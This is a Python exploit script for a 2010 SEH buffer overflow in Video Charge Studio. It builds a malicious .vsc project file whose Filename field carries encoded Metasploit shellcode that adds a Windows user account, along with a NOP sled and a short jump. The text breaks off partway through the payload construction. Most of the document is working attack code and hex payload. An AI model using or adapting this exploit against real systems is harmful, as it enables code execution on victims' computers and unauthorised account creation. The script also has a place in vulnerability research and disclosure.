#!/usr/bin/python # Exploit Title: Video Charge Studio <= 2.9.5.643 (.vsc) Buffer Overflow (SEH) # Date: 12/05/2010 # Author: xsploitedsec # URL: http://www.x-sploited.com/ # Contact: xsploitedsecurity [at] x-sploited.com # Software Link: http://www.videocharge.com/download/VideoChargeStudio_Install.exe # Version: <= 2.9.5.643 (Latest) # Tested on: Windows XP SP3 (Physical machine) # CVE: N/A ### Software Description: ### # Videocharge Studio is a video editing software which is intended for those users who # regularly work with video, create Internet video galleries, convert video files. # Videocharge Studio includes all features for video editing: video converting, splitting # video into parts, joining several video files into a single one, adding watermark on # video or image (add logo to video or photo), embedding image into video file, creating # video from several images, editing audio. Videocharge Studio can edit video without # reencoding as well. ### Exploit information: ### # Video Charge Studio is prone to a buffer overflow when parsing a malicious vsc files # "Filename" value field. # An attacker could trick a user into loading a specially crafted vsc file to execute # arbitrary code on a users PC without there consent. ### Shouts: ### # kaotix, sheep, deca, havalito, corelanc0d3r/corelan team, exploit-db crew, packetstormsecurity # Have fun! # "When you know that you're capable of dealing with whatever comes, you have the only # security the world has to offer." -Harry Browne import struct import sys about = "=================================================\n" about += " Video Charge Studio <= 2.9.5.643 (.vsc) BoF (SEH)\n" about += " Author: xsploited security\n URL: http://www.x-sploited.com/\n" about += " Contact: xsploitedsecurity [at] gmail.com\n" about += "=================================================\n" print about # msfpayload windows/adduser user=xsploited pass=sec EXITFUNC=seh # R | msfencode -e x86/fnstenv_mov -c 1 -t perl -b '\x00\x09\x0a # \x0d\x3e\x3c\x26\x20\x21\x22\x23\x2a\x07' > /tmp/encoded.txt # [*] x86/fnstenv_mov succeeded with size 302 (iteration=1) shellcode = ( "\x6a\x46\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xce" "\xcf\xb0\x91\x83\xeb\xfc\xe2\xf4\x32\x27\x39\x91\xce\xcf" "\xd0\x18\x2b\xfe\x62\xf5\x45\x9d\x80\x1a\x9c\xc3\x3b\xc3" "\xda\x44\xc2\xb9\xc1\x78\xfa\xb7\xff\x30\x81\x51\x62\xf3" "\xd1\xed\xcc\xe3\x90\x50\x01\xc2\xb1\x56\x2c\x3f\xe2\xc6" "\x45\x9d\xa0\x1a\x8c\xf3\xb1\x41\x45\x8f\xc8\x14\x0e\xbb" "\xfa\x90\x1e\x9f\x3b\xd9\xd6\x44\xe8\xb1\xcf\x1c\x53\xad" "\x87\x44\x84\x1a\xcf\x19\x81\x6e\xff\x0f\x1c\x50\x01\xc2" "\xb1\x56\xf6\x2f\xc5\x65\xcd\xb2\x48\xaa\xb3\xeb\xc5\x73" "\x96\x44\xe8\xb5\xcf\x1c\xd6\x1a\xc2\x84\x3b\xc9\xd2\xce" "\x63\x1a\xca\x44\xb1\x41\x47\x8b\x94\xb5\x95\x94\xd1\xc8" "\x94\x9e\x4f\x71\x96\x90\xea\x1a\xdc\x24\x36\xcc\xa4\xce" "\x3d\x14\x77\xcf\xb0\x91\x9e\xa7\x81\x1a\xa1\x48\x4f\x44" "\x75\x31\xbe\xa3\x24\xa7\x16\x04\x73\x52\x4f\x44\xf2\xc9" "\xcc\x9b\x4e\x34\x50\xe4\xcb\x74\xf7\x82\xbc\xa0\xda\x91" "\x9d\x30\x65\xf2\xa3\xab\x9e\xf4\xb6\xaa\x90\xbe\xad\xef" "\xde\xf4\xba\xef\xc5\xe2\xab\xbd\x90\xe9\xbd\xbf\xdc\xfe" "\xa7\xbb\xd5\xf5\xee\xbc\xd5\xf2\xee\xe0\xf1\xd5\x8a\xef" "\x96\xb7\xee\xa1\xd5\xe5\xee\xa3\xdf\xf2\xaf\xa3\xd7\xe3" "\xa1\xba\xc0\xb1\x8f\xab\xdd\xf8\xa0\xa6\xc3\xe5\xbc\xae" "\xc4\xfe\xbc\xbc\x90\xe9\xbd\xbf\xdc\xfe\xa7\xbb\xd5\xf5" "\xee\xe0\xf1\xd5\x8a\xcf\xba\x91" ); header = ( "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30" "\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x57\x69\x6e\x64\x6f\x77\x73\x2d" "\x31\x32\x35\x32\x22\x20\x3f\x3e\x3c\x63\x6f\x6e\x66\x69\x67\x20\x76\x65\x72\x3d" "\x22\x32\x2e\x39\x2e\x35\x2e\x36\x34\x33\x22\x3e\x0d\x0a\x3c\x63\x6f\x6c\x73\x20" "\x6e\x61\x6d\x65\x3d\x22\x46\x69\x6c\x65\x73\x22\x2f\x3e\x0d\x0a\x3c\x63\x6f\x6c" "\x73\x20\x6e\x61\x6d\x65\x3d\x22\x50\x72\x6f\x66\x69\x6c\x65\x73\x22\x3e\x0d\x0a" "\x3c\x50\x72\x6f\x70\x65\x72\x74\x79\x20\x6e\x61\x6d\x65\x3d\x22\x50\x72\x6f\x66" "\x69\x6c\x65\x22\x3e\x0d\x0a\x3c\x63\x6f\x6c\x73\x20\x6e\x61\x6d\x65\x3d\x22\x46" "\x6f\x72\x6d\x61\x74\x73\x22\x3e\x0d\x0a\x3c\x50\x72\x6f\x70\x65\x72\x74\x79\x20" "\x6e\x61\x6d\x65\x3d\x22\x46\x6f\x72\x6d\x61\x74\x22\x3e\x0d\x0a\x3c\x56\x61\x6c" "\x75\x65\x20\x6e\x61\x6d\x65\x3d\x22\x4e\x61\x6d\x65\x22\x20\x74\x79\x70\x65\x3d" "\x22\x38\x22\x20\x76\x61\x6c\x75\x65\x3d\x22" ); footer = ( "\x22\x2f\x3e\x0d\x0a\x3c\x2f\x50\x72\x6f\x70\x65\x72\x74\x79\x3e\x0d\x0a" "\x3c\x2f\x63\x6f\x6c\x73\x3e\x0d\x0a\x3c\x2f\x50\x72\x6f\x70\x65\x72\x74\x79\x3e\x0d" "\x0a\x3c\x2f\x63\x6f\x6c\x73\x3e\x0d\x0a\x3c\x2f\x63\x6f\x6e\x66\x69\x67\x3e" ); size = 824; #824 junk bytes triggers the bof payload = "\x90" * (size - len(shellcode)); payload += shellcode payload += "\xEB\x06\x90\x90"; #jmp short payload += struct.pack("